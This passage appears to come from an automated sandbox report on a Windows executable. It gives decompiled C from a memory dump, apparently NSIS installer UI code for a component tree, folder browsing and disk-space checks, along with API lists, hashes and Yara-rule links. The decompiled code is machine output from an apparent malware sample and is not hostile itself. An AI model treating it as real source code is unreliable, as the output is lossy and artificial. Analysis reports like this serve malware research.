							__eflags =  *0x42ec39 & 0x00000002;
							if(( *0x42ec39 & 0x00000002) != 0) {
								L41:
								__eflags = _v16 - _t315;
								if(_v16 != _t315) {
									_t232 = _v16;
									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
											 *_t284 =  *_t284 & 0xffffffdf;
											__eflags =  *_t284;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							__eflags = _a8 - 0x413;
							if(_a8 == 0x413) {
								L33:
								__eflags = _a8 - 0x413;
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E00404782(_v8, _a8 != 0x413);
								__eflags = _t240 - _t315;
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									__eflags = _t289 & 0x00000010;
									if((_t289 & 0x00000010) == 0) {
										__eflags = _t289 & 0x00000040;
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
											__eflags = _t298;
										} else {
											_t300 = _t289 ^ 0x00000080;
											__eflags = _t300;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t242 =  *0x42ec38; // 0x80
										_t289 = 1;
										_a8 = 0x40f;
										_t245 =  !_t242 >> 0x00000008 & 1;
										__eflags = _t245;
										_a12 = 1;
										_a16 = _t245;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
							goto L48;
						}
						goto L30;
					} else {
						__eflags = _a8 - 0x413;
						if(_a8 != 0x413) {
							L48:
							__eflags = _a8 - 0x111;
							if(_a8 != 0x111) {
								L56:
								__eflags = _a8 - 0x200;
								if(_a8 == 0x200) {
									SendMessageA(_v8, 0x200, _t315, _t315);
								}
								__eflags = _a8 - 0x40b;
								if(_a8 == 0x40b) {
									_t220 =  *0x42a07c;
									__eflags = _t220 - _t315;
									if(_t220 != _t315) {
										ImageList_Destroy(_t220);
									}
									_t221 =  *0x42a094;
									__eflags = _t221 - _t315;
									if(_t221 != _t315) {
										GlobalFree(_t221);
									}
									 *0x42a07c = _t315;
									 *0x42a094 = _t315;
									 *0x42ec80 = _t315;
								}
								__eflags = _a8 - 0x40f;
								if(_a8 != 0x40f) {
									L86:
									__eflags = _a8 - 0x420;
									if(_a8 == 0x420) {
										__eflags =  *0x42ec39 & 0x00000001;
										if(( *0x42ec39 & 0x00000001) != 0) {
											__eflags = _a16 - 0x20;
											_t189 = (0 | _a16 == 0x00000020) << 3;
											__eflags = _t189;
											_t316 = _t189;
											ShowWindow(_v8, _t316);
											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
										}
									}
									goto L89;
								} else {
									E004011EF(_t289, _t315, _t315);
									__eflags = _a12 - _t315;
									if(_a12 != _t315) {
										E0040140B(8);
									}
									__eflags = _a16 - _t315;
									if(_a16 == _t315) {
										L73:
										E004011EF(_t289, _t315, _t315);
										__eflags =  *0x42ec4c - _t315; // 0x3
										_v32 =  *0x42a094;
										_t196 =  *0x42ec48; // 0x504f0c
										_v60 = 0xf030;
										_v16 = _t315;
										if(__eflags <= 0) {
											L84:
											InvalidateRect(_v8, _t315, 1);
											_t198 =  *0x42e3fc; // 0x50be62
											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
												E0040473D(0x3ff, 0xfffffffb, E00404755(5));
											}
											goto L86;
										} else {
											_t142 = _t196 + 8; // 0x504f14
											_t281 = _t142;
											do {
												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
												__eflags = _t202 - _t315;
												if(_t202 != _t315) {
													_t291 =  *_t281;
													_v68 = _t202;
													__eflags = _t291 & 0x00000001;
													_v72 = 8;
													if((_t291 & 0x00000001) != 0) {
														_t151 =  &(_t281[4]); // 0x504f24
														_v72 = 9;
														_v56 = _t151;
														_t154 =  &(_t281[0]);
														 *_t154 = _t281[0] & 0x000000fe;
														__eflags =  *_t154;
													}
													__eflags = _t291 & 0x00000040;
													if((_t291 & 0x00000040) == 0) {
														_t206 = (_t291 & 0x00000001) + 1;
														__eflags = _t291 & 0x00000010;
														if((_t291 & 0x00000010) != 0) {
															_t206 = _t206 + 3;
															__eflags = _t206;
														}
													} else {
														_t206 = 3;
													}
													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
													__eflags = _t294;
													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
													SendMessageA(_v8, 0x1102, _t294, _v68);
													SendMessageA(_v8, 0x110d, _t315,  &_v72);
												}
												_v16 = _v16 + 1;
												_t281 =  &(_t281[0x106]);
												__eflags = _v16 -  *0x42ec4c; // 0x3
											} while (__eflags < 0);
											goto L84;
										}
									} else {
										_t282 = E004012E2( *0x42a094);
										E00401299(_t282);
										_t217 = 0;
										_t289 = 0;
										__eflags = _t282 - _t315;
										if(_t282 <= _t315) {
											L72:
											SendMessageA(_v12, 0x14e, _t289, _t315);
											_a16 = _t282;
											_a8 = 0x420;
											goto L73;
										} else {
											goto L69;
										}
										do {
											L69:
											_t309 = _v20;
											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
												_t289 = _t289 + 1;
												__eflags = _t289;
											}
											_t217 = _t217 + 1;
											__eflags = _t217 - _t282;
										} while (_t217 < _t282);
										goto L72;
									}
								}
							}
							__eflags = _a12 - 0x3f9;
							if(_a12 != 0x3f9) {
								goto L89;
							}
							__eflags = _a12 >> 0x10 - 1;
							if(_a12 >> 0x10 != 1) {
								goto L89;
							}
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							__eflags = _t227 - 0xffffffff;
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							__eflags = _t283 - 0xffffffff;
							if(_t283 == 0xffffffff) {
								L54:
								_t283 = 0x20;
								L55:
								E00401299(_t283);
								SendMessageA(_a4, 0x420, _t315, _t283);
								_a12 = 1;
								_a16 = _t315;
								_a8 = 0x40f;
								goto L56;
							}
							_t231 = _v20;
							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
								goto L55;
							}
							goto L54;
						}
						goto L28;
					}
				} else {
					 *0x42ec80 = _a4;
					_t247 =  *0x42ec4c; // 0x3
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x42a094 = GlobalAlloc(0x40, _t247 << 2);
					_t250 = LoadBitmapA( *0x42ec20, 0x6e);
					 *0x42a088 =  *0x42a088 | 0xffffffff;
					_v24 = _t250;
					 *0x42a090 = SetWindowLongA(_v8, 0xfffffffc, E00404E03);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42a07c = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x42a07c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405BE9(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403E83(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403E83(_a4);
					_t318 = 0;
					_t288 = 0;
					_t328 =  *0x42ec4c - _t318; // 0x3
					if(_t328 <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									__eflags = _t269 & 0x00000004;
									if((_t269 & 0x00000004) == 0) {
										 *( *0x42a094 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x42a094 + _t318 * 4) = _t274;
									_t288 =  *( *0x42a094 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_t331 = _t318 -  *0x42ec4c; // 0x3
							_v24 = _t311;
						} while (_t331 < 0);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403EB8(_v8);
								_t280 = _v32;
								_t315 = 0;
								__eflags = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403EB8(_v12);
								L89:
								return E00403EEA(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}






































































              0x00404820
              0x00404826
              0x00404828
              0x0040482e
              0x00404834
              0x00404837
              0x00404841
              0x0040484a
              0x0040484d
              0x00404850
              0x00404a78
              0x00404a78
              0x00404a7f
              0x00404a93
              0x00404a81
              0x00404a83
              0x00404a86
              0x00404a87
              0x00404a8e
              0x00404a8e
              0x00404a96
              0x00404a9f
              0x00404aaa
              0x00404aaa
              0x00404aad
              0x00404ab0
              0x00404abf
              0x00404abf
              0x00404ac6
              0x00404b3e
              0x00404b3e
              0x00404b41
              0x00404b43
              0x00404b46
              0x00404b4d
              0x00404b5b
              0x00404b5b
              0x00404b5d
              0x00404b60
              0x00404b67
              0x00404b69
              0x00404b6d
              0x00404b8a
              0x00404b8e
              0x00404b8e
              0x00404b6f
              0x00404b7c
              0x00404b7c
              0x00404b6d
              0x00404b67
              0x00000000
              0x00404b41
              0x00404ac8
              0x00404acb
              0x00404ad6
              0x00404ad8
              0x00404adb
              0x00404ae2
              0x00404ae7
              0x00404ae9
              0x00404af3
              0x00404af3
              0x00404af7
              0x00404af9
              0x00404afc
              0x00404afe
              0x00404b01
              0x00404b17
              0x00404b17
              0x00404b03
              0x00404b03
              0x00404b09
              0x00404b0b
              0x00404b12
              0x00404b0d
              0x00404b0d
              0x00404b0d
              0x00404b0b
              0x00404b1b
              0x00404b1d
              0x00404b22
              0x00404b2b
              0x00404b2c
              0x00404b36
              0x00404b36
              0x00404b38
              0x00404b3b
              0x00404b3b
              0x00404afc
              0x00000000
              0x00404ae9
              0x00404acd
              0x00404ad0
              0x00404ad4
              0x00000000
              0x00000000
              0x00000000
              0x00404ad4
              0x00404ab2
              0x00404ab9
              0x00000000
              0x00000000
              0x00000000
              0x00404aa1
              0x00404aa1
              0x00404aa4
              0x00404b91
              0x00404b91
              0x00404b98
              0x00404c0c
              0x00404c0c
              0x00404c13
              0x00404c1f
              0x00404c1f
              0x00404c21
              0x00404c28
              0x00404c2a
              0x00404c2f
              0x00404c31
              0x00404c34
              0x00404c34
              0x00404c3a
              0x00404c3f
              0x00404c41
              0x00404c44
              0x00404c44
              0x00404c4a
              0x00404c50
              0x00404c56
              0x00404c56
              0x00404c5c
              0x00404c63
              0x00404db0
              0x00404db0
              0x00404db7
              0x00404db9
              0x00404dc0
              0x00404dc4
              0x00404dd1
              0x00404dd1
              0x00404dd4
              0x00404dda
              0x00404dec
              0x00404dec
              0x00404dc0
              0x00000000
              0x00404c69
              0x00404c6b
              0x00404c70
              0x00404c73
              0x00404c77
              0x00404c77
              0x00404c7c
              0x00404c7f
              0x00404cc0
              0x00404cc2
              0x00404ccc
              0x00404cd2
              0x00404cd5
              0x00404cda
              0x00404ce1
              0x00404ce4
              0x00404d86
              0x00404d8c
              0x00404d92
              0x00404d97
              0x00404d9a
              0x00404dab
              0x00404dab
              0x00000000
              0x00404cea
              0x00404cea
              0x00404cea
              0x00404ced
              0x00404cf3
              0x00404cf6
              0x00404cf8
              0x00404cfa
              0x00404cfc
              0x00404cff
              0x00404d02
              0x00404d09
              0x00404d0b
              0x00404d0e
              0x00404d15
              0x00404d18
              0x00404d18
              0x00404d18
              0x00404d18
              0x00404d1c
              0x00404d1f
              0x00404d2b
              0x00404d2c
              0x00404d2f
              0x00404d31
              0x00404d31
              0x00404d31
              0x00404d21
              0x00404d23
              0x00404d23
              0x00404d50
              0x00404d50
              0x00404d51
              0x00404d5d
              0x00404d6c
              0x00404d6c
              0x00404d6e
              0x00404d71
              0x00404d7a
              0x00404d7a
              0x00000000
              0x00404ced
              0x00404c81
              0x00404c8c
              0x00404c8f
              0x00404c94
              0x00404c96
              0x00404c98
              0x00404c9a
              0x00404caa
              0x00404cb4
              0x00404cb6
              0x00404cb9
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00404c9c
              0x00404c9c
              0x00404c9c
              0x00404c9f
              0x00404ca2
              0x00404ca4
              0x00404ca4
              0x00404ca4
              0x00404ca5
              0x00404ca6
              0x00404ca6
              0x00000000
              0x00404c9c
              0x00404c7f
              0x00404c63
              0x00404b9a
              0x00404ba0
              0x00000000
              0x00000000
              0x00404bac
              0x00404bb0
              0x00000000
              0x00000000
              0x00404bc0
              0x00404bc2
              0x00404bc5
              0x00000000
              0x00000000
              0x00404bd7
              0x00404bd9
              0x00404bdc
              0x00404be6
              0x00404be8
              0x00404be9
              0x00404bea
              0x00404bf9
              0x00404bfb
              0x00404c02
              0x00404c05
              0x00000000
              0x00404c05
              0x00404bde
              0x00404be1
              0x00404be4
              0x00000000
              0x00000000
              0x00000000
              0x00404be4
              0x00000000
              0x00404aa4
              0x00404856
              0x0040485b
              0x00404860
              0x00404865
              0x00404866
              0x0040486f
              0x0040487a
              0x00404885
              0x0040488b
              0x00404899
              0x004048ae
              0x004048b3
              0x004048be
              0x004048c7
              0x004048dc
              0x004048ed
              0x004048fa
              0x004048fa
              0x004048ff
              0x00404905
              0x00404907
              0x0040490a
              0x0040490f
              0x00404914
              0x00404916
              0x00404916
              0x00404936
              0x00404936
              0x00404938
              0x00404939
              0x0040493e
              0x00404941
              0x00404944
              0x00404948
              0x0040494d
              0x00404952
              0x00404956
              0x0040495b
              0x00404960
              0x00404962
              0x00404964
              0x0040496a
              0x00404a34
              0x00404a47
              0x00000000
              0x00404970
              0x00404973
              0x00404976
              0x00404979
              0x00404979
              0x0040497f
              0x00404985
              0x00404988
              0x0040498e
              0x0040498f
              0x00404994
              0x0040499d
              0x004049a4
              0x004049a7
              0x004049aa
              0x004049ad
              0x004049e7
              0x004049e9
              0x00404a12
              0x004049eb
              0x004049f8
              0x004049f8
              0x004049af
              0x004049b2
              0x004049c1
              0x004049cb
              0x004049d3
              0x004049da
              0x004049e2
              0x004049e2
              0x004049ad
              0x00404a18
              0x00404a19
              0x00404a1f
              0x00404a25
              0x00404a25
              0x00404a32
              0x00404a4d
              0x00404a51
              0x00404a6e
              0x00404a73
              0x00404a76
              0x00404a76
              0x00000000
              0x00404a53
              0x00404a58
              0x00404a61
              0x00404dee
              0x00404e00
              0x00404e00
              0x00404a51
              0x00000000
              0x00404a32
              0x0040496a

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
              • String ID: $M$N$`MP
              • API String ID: 1638840714-249421029
              • Opcode ID: 03cda6e4da2b8fb4d01f8465d39c3ee25f13877e52dcc6e8ff3e3942391822dc
              • Instruction ID: 6f0a98d5dd10ef4145f29f69d97320cca22844812bd755e22afdd9aff1593a00
              • Opcode Fuzzy Hash: 03cda6e4da2b8fb4d01f8465d39c3ee25f13877e52dcc6e8ff3e3942391822dc
              • Instruction Fuzzy Hash: A702B1B0A00209EFEB25CF95DD45AAE7BB5FB84314F10413AF610BA2E1C7799A41CF58
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004042C1, Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 273stringCOMMON
              Download Yara Rule
              C-Code - Quality: 78%
              			E004042C1(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr _t124;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x429870;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x42f000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E0040546C(0x3fb, _t146);
					E00405E29(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040546C(0x3fb, _t146);
							if(E0040579B(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00405BC7(0x429068, _t146);
							_t87 = E00405F57(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00405BC7(0x429068, _t146);
								_t89 = E0040574E(0x429068);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x429068,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x429068) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x429068,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t159 = E00405701(0x429068) - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x429068) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404755(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42e3fc; // 0x50be62
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E0040473D(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x429058);
									} else {
										E00404678(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42ecc4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E00403EA5(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42a08c == _t158) {
									E00404256();
								}
								 *0x42a08c = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x42a0a0;
							_v60 = E00404612;
							_v56 = _t146;
							_v68 = E00405BE9(_t146, 0x42a0a0, _t166, 0x429470, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E004056BA(_t146);
								_t124 =  *0x42ec30; // 0x504d60
								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t146 == "C:\\Users\\Albus\\AppData\\Local\\Temp") {
									E00405BE9(_t146, 0x42a0a0, _t166, 0, _t125);
									if(lstrcmpiA(0x42dbc0, 0x42a0a0) != 0) {
										lstrcatA(_t146, 0x42dbc0);
									}
								}
								 *0x42a08c =  *0x42a08c + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405727(_t146) != 0 && E0040574E(_t146) == 0) {
						E004056BA(_t146);
					}
					 *0x42e3f8 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403E83(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403E83(_t166);
					E00403EB8(_t165);
					_t138 = E00405F57(0xa);
					if(_t138 == 0) {
						L53:
						return E00403EEA(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}














































              0x004042c1
              0x004042c7
              0x004042cd
              0x004042da
              0x004042e8
              0x004042eb
              0x004042f3
              0x004042f9
              0x004042f9
              0x00404305
              0x00404308
              0x00404376
              0x0040437d
              0x00404454
              0x0040445b
              0x0040446a
              0x0040446a
              0x0040446e
              0x00404478
              0x00404485
              0x00404487
              0x00404487
              0x00404495
              0x0040449c
              0x004044a3
              0x004044a6
              0x004044dd
              0x004044df
              0x004044e5
              0x004044ea
              0x004044ee
              0x004044f0
              0x004044f0
              0x0040450c
              0x00000000
              0x0040450e
              0x00404511
              0x0040451f
              0x00404525
              0x00404526
              0x00404529
              0x0040452c
              0x00000000
              0x0040452c
              0x004044a8
              0x004044aa
              0x004044ae
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x004044b0
              0x004044b0
              0x004044bd
              0x004044c2
              0x00000000
              0x00000000
              0x004044c6
              0x004044c8
              0x004044c8
              0x004044d3
              0x004044d6
              0x004044db
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x004044db
              0x00404538
              0x00404542
              0x00404545
              0x00404548
              0x0040454f
              0x0040454f
              0x00404551
              0x00404551
              0x00404556
              0x00404558
              0x00404560
              0x00404567
              0x00404569
              0x00404574
              0x00404574
              0x00404569
              0x0040457b
              0x00404584
              0x0040458e
              0x00404596
              0x004045b1
              0x00404598
              0x004045a1
              0x004045a1
              0x00404596
              0x004045b6
              0x004045bb
              0x004045c0
              0x004045c9
              0x004045c9
              0x004045d2
              0x004045d4
              0x004045d4
              0x004045e0
              0x004045e8
              0x004045f2
              0x004045f2
              0x004045f7
              0x00000000
              0x004045f7
              0x004044a6
              0x0040445d
              0x00404464
              0x00000000
              0x00000000
              0x00000000
              0x00404464
              0x00404383
              0x0040438c
              0x004043a6
              0x004043ab
              0x004043b5
              0x004043bc
              0x004043c8
              0x004043cb
              0x004043ce
              0x004043d5
              0x004043dd
              0x004043e0
              0x004043e4
              0x004043eb
              0x004043f3
              0x0040444d
              0x004043f5
              0x004043f6
              0x004043fd
              0x00404402
              0x00404407
              0x0040440f
              0x0040441c
              0x00404430
              0x00404434
              0x00404434
              0x00404430
              0x00404439
              0x00404446
              0x00404446
              0x004043f3
              0x00000000
              0x004043ab
              0x00404399
              0x00000000
              0x00000000
              0x0040439f
              0x00000000
              0x0040430a
              0x00404317
              0x00404320
              0x0040432d
              0x0040432d
              0x00404334
              0x0040433a
              0x00404343
              0x00404346
              0x00404349
              0x00404351
              0x00404354
              0x00404357
              0x0040435d
              0x00404364
              0x0040436b
              0x004045fd
              0x0040460f
              0x00404371
              0x00404374
              0x00000000
              0x00404374
              0x0040436b

              APIs
              • GetDlgItem.USER32(?,000003FB), ref: 00404310
              • SetWindowTextA.USER32(00000000,?), ref: 0040433A
              • SHBrowseForFolderA.SHELL32(?,00429470,?), ref: 004043EB
              • CoTaskMemFree.OLE32(00000000), ref: 004043F6
              • lstrcmpiA.KERNEL32(TclpOwkq,0042A0A0,00000000,?,?), ref: 00404428
              • lstrcatA.KERNEL32(?,TclpOwkq), ref: 00404434
              • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404446
                • Part of subcall function 0040546C: GetDlgItemTextA.USER32 ref: 0040547F
                • Part of subcall function 00405E29: CharNextA.USER32(?), ref: 00405E81
                • Part of subcall function 00405E29: CharNextA.USER32(?), ref: 00405E8E
                • Part of subcall function 00405E29: CharNextA.USER32(?), ref: 00405E93
                • Part of subcall function 00405E29: CharPrevA.USER32(?,?), ref: 00405EA3
              • GetDiskFreeSpaceA.KERNEL32(00429068,?,?,0000040F,?,00429068,00429068,?,00000001,00429068,?,?,000003FB,?), ref: 00404504
              • MulDiv.KERNEL32 ref: 0040451F
                • Part of subcall function 00404678: lstrlenA.KERNEL32(0042A0A0,0042A0A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404593,000000DF,00000000,00000400,?), ref: 00404716
                • Part of subcall function 00404678: wsprintfA.USER32 ref: 0040471E
                • Part of subcall function 00404678: SetDlgItemTextA.USER32(?,0042A0A0), ref: 00404731
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
              • String ID: A$C:\Users\user\AppData\Local\Temp$TclpOwkq$`MP
              • API String ID: 2624150263-490765851
              • Opcode ID: 3f80b46dd096fd368bede20d2bfb79225146288fd6115dbd0f947cd12367bd25
              • Instruction ID: 171edb992a826102812884c43759f415235567a44aa7ca021352bae990107689
              • Opcode Fuzzy Hash: 3f80b46dd096fd368bede20d2bfb79225146288fd6115dbd0f947cd12367bd25
              • Instruction Fuzzy Hash: 6CA16FB1900208ABDB11AFA5DC41BAF77B8EF84315F14803BF615B62D1D77C9A418F69
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00402053, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
              Download Yara Rule
              C-Code - Quality: 74%
              			E00402053() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
